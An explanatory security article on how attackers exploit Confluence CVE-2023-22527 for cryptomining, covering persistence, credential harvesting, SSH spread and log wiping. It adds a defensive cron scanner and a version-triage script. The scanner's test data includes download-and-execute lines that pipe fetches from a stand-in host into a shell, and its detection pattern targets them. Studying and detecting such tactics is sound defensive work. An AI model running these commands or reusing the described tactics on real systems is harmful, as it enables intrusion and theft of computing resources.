Detailed process - how hackers exploit Atlassian CVE-2023-22527
CVE-2023-22527 is a critical vulnerability affecting Atlassian Confluence Data Center and Confluence Server, versions 8.0.x through 8.5.3. The vulnerability involves a template injection flaw that allows unauthenticated attackers to execute remote code on vulnerable systems.
Threat actors have been exploiting this vulnerability to transform compromised environments into cryptomining networks. This article explains the exploit process - step by step.
Exploitation Begins: The Initial Access
Attackers begin their exploitation by taking advantage of the CVE-2023-22527 vulnerability. This flaw allows them to execute code remotely on the affected Confluence instances without needing authentication. By abusing the template injection vulnerability, the attackers gain an entry point into the system, enabling them to deploy various malicious scripts that set the stage for cryptomining activities.
Deploying Malicious Scripts and Tools
Once inside, the attackers deploy specific malicious scripts and tools. One of the primary tools used in these attacks is the XMRig miner, a popular cryptomining program that uses the processing power of compromised systems to mine cryptocurrency. The attackers drop these miners onto the servers using payloads, often delivered as Executable and Linkable Format (ELF) files.
Killing Competitors
The malicious scripts actively seek out and kill any competing cryptomining processes running on the system. By terminating these rival processes, the attackers ensure that their own mining operations can run at maximum efficiency without competition.
Maintaining Persistence via Cron Job Scheduling
To maintain long-term control over the compromised systems, attackers rely on cron jobs, which are scheduled tasks that run at specified intervals. The scripts delete existing cron jobs and replace them with new ones that reconnect to the command-and-control (C&C) server every five minutes. This ensures that even if the mining process is stopped, it will automatically restart shortly after.
Disabling Security Defenses
The attackers take measures to neutralize security defenses that could interfere with their operations. The deployed script’s der function specifically targets and uninstalls security services such as Alibaba Cloud Shield and Tencent Cloud mirrors. These actions are meant to reduce the chance of detection and interruption by cloud security tools.
Gathering Information for Further Spread
Another step involves the localgo function of the script, which gathers sensitive information from the compromised system. This function identifies the machine's IP address, user accounts, and SSH keys by scanning the user’s bash history, SSH configurations, and known hosts files. The data collected allows the attackers to expand their cryptomining activities to other connected systems using automated SSH commands.
Spreading the Mining Script to Other Hosts
Using the information gathered, the attackers spread their mining activities to other hosts. This is accomplished using specific SSH commands that connect to remote systems without host key verification (-oStrictHostKeyChecking=no), disable interactive password prompts (-oBatchMode=yes), and set quick timeouts (-oConnectTimeout=3). These settings ensure that the attack script can rapidly propagate across reachable hosts, embedding the mining payloads into each compromised machine.
Adding More Cron Jobs for Resilience
To further solidify their hold, the attackers add multiple cron jobs under different names (e.g., whoami, nginx, apache) in various system directories like init.d, cron.hourly, and cron.d. This redundancy ensures that even if some jobs are detected and removed, others remain to keep the mining activities operational.
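The cron behaviour described here and in the earlier persistence section (a job every five minutes that re-fetches the payload, plus redundant copies under service-like names in init.d, cron.hourly and cron.d) can be checked for with a small scanner. The following is an added example, not code from the article, that walks a constructed snapshot of those locations, parses crontab lines for schedule and command, and flags entries that run at most every five minutes and pipe a download into a shell. The name-based list only annotates a finding; a legitimate /etc/init.d/nginx with no download-and-execute is not flagged. All file contents and the example.invalid URL are constructed.

```python
import posixpath
import re
from typing import Dict, List, Optional, Tuple

# Constructed snapshot of persistence locations (path -> content); nothing
# here is real telemetry.
SNAPSHOT: Dict[str, str] = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 *\t* * *\troot\tcd / && run-parts --report /etc/cron.hourly\n"
    ),
    "/var/spool/cron/crontabs/root": (
        "# m h dom mon dow command\n"
        "*/5 * * * * curl -fsSL http://example.invalid/solr.sh | sh\n"
        "0 3 * * * /usr/local/bin/backup.sh\n"
    ),
    "/etc/cron.d/apache": "*/5 * * * * root wget -q -O- http://example.invalid/x.sh | bash\n",
    "/etc/cron.d/certbot": "0 */12 * * * root certbot -q renew\n",
    "/etc/cron.hourly/whoami": "#!/bin/sh\ncurl -s http://example.invalid/x.sh | sh\n",
    "/etc/init.d/nginx": "#!/bin/sh\n# Provides: nginx\nexec /usr/sbin/nginx\n",
}

CRONTAB_FILES = ("/etc/crontab",)
CRONTAB_DIRS = ("/etc/cron.d/", "/var/spool/cron/crontabs/")
SCRIPT_DIRS = ("/etc/cron.hourly/", "/etc/init.d/")
MASQUERADE_NAMES = {"whoami", "nginx", "apache"}  # names cited in the article
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")


def min_interval_minutes(minute_field: str) -> Optional[int]:
    """Minutes between runs implied by the minute field ('*' or '*/N');
    None for a fixed value or list, i.e. at most once an hour."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def parse_crontab_line(line: str, system_format: bool) -> Optional[Tuple[str, str]]:
    """Return (minute_field, command); None for blank, comment or VAR= lines.
    System crontabs (/etc/crontab, /etc/cron.d) carry a user column."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]+=", line):
        return None
    fields = line.split(None, 6 if system_format else 5)
    if len(fields) < (7 if system_format else 6):
        return None
    return fields[0], fields[-1]


def scan_snapshot(files: Dict[str, str], max_interval: int = 5) -> List[dict]:
    findings = []
    for path, content in files.items():
        name = posixpath.basename(path)
        if path in CRONTAB_FILES or path.startswith(CRONTAB_DIRS):
            system_format = path in CRONTAB_FILES or path.startswith("/etc/cron.d/")
            for line in content.splitlines():
                parsed = parse_crontab_line(line, system_format)
                if not parsed:
                    continue
                minute, command = parsed
                interval = min_interval_minutes(minute)
                frequent = interval is not None and interval <= max_interval
                if frequent and DOWNLOAD_EXEC.search(command):
                    findings.append({"path": path,
                                     "reason": "frequent download-and-execute",
                                     "command": command})
        elif path.startswith(SCRIPT_DIRS):
            m = DOWNLOAD_EXEC.search(content)
            if m:
                reason = "download-and-execute script"
                if name in MASQUERADE_NAMES:
                    reason += " under a masquerading name"
                findings.append({"path": path, "reason": reason, "command": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan_snapshot(SNAPSHOT):
        print(f"{f['path']}: {f['reason']}: {f['command']}")
```

On a live host the same functions can be fed with the real files (read /etc/crontab, the two directories and /var/spool/cron/crontabs) and the schedule threshold tuned; the pairing of a short interval with a remote fetch is what separates the article's reconnect job from routine maintenance entries such as the certbot one above.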
Final Cleanup and Mining Commencement
Before fully initiating the cryptomining operations, the attackers perform a final cleanup. The solr.sh function is used to terminate any remaining security tools that could disrupt the mining process. Once the cleanup is complete, the attackers start the XMRig miner, exploiting the system's resources to mine cryptocurrency. To cover their tracks, they clear log files and bash histories, making it difficult for administrators to trace the attack back to its origin.
Continuous Exploitation and Risk
From mid-June to the end of July 2024, there was a noticeable surge in exploitation attempts against CVE-2023-22527. Multiple threat actors have been observed deploying similar scripts, showing that this vulnerability is being actively used for cryptomining on a global scale.
Mitigation and Prevention
Organizations are advised to update their Confluence instances to the latest versions to close this critical vulnerability. Implementing security best practices such as regular patching, network segmentation, conducting security audits, and maintaining an effective incident response plan is crucial in defending against such exploit attempts.
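Patch triage across a Confluence estate starts with knowing which instances fall inside the affected range the article states (8.0.x through 8.5.3). The following is an added example, not from the article or from Atlassian, that compares versions numerically rather than as strings, so that 8.5.10 is correctly placed above 8.5.3, and reports unparseable entries instead of silently treating them as safe. The host names and version strings in the inventory are constructed; confirm the exact fixed versions against Atlassian's advisory for your deployment.

```python
import re
from typing import Dict, Optional, Tuple

# Affected range as stated in the article: 8.0.x through 8.5.3 inclusive.
AFFECTED_MIN = (8, 0, 0)
AFFECTED_MAX = (8, 5, 3)

# Constructed host -> version inventory (placeholders, not real hosts).
INVENTORY: Dict[str, str] = {
    "wiki-01": "8.5.3",
    "wiki-02": "8.5.4",
    "wiki-03": "8.5.10",
    "wiki-04": "7.19.17",
    "wiki-05": "8.0.0",
    "wiki-06": "n/a",
}


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Parse 'major.minor[.patch]' (ignoring any trailing suffix) into a
    comparable tuple; None when the string has no version at all."""
    m = re.match(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def is_affected(version: str) -> Optional[bool]:
    """True inside the affected range, False outside it, None if unknown."""
    v = parse_version(version)
    if v is None:
        return None
    return AFFECTED_MIN <= v <= AFFECTED_MAX


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Classify each host as affected, not-in-range or unknown; unknown
    entries need manual follow-up rather than being assumed patched."""
    out = {}
    for host, ver in inventory.items():
        a = is_affected(ver)
        out[host] = "unknown" if a is None else ("affected" if a else "not-in-range")
    return out


if __name__ == "__main__":
    for host, status in triage(INVENTORY).items():
        print(f"{host:8} {INVENTORY[host]:8} {status}")
```

The tuple comparison is the point of the example: a naive string check would rank "8.5.10" below "8.5.3" and mark an upgraded instance as still vulnerable, while a version that cannot be parsed should surface as a gap in the inventory, not as a patched host.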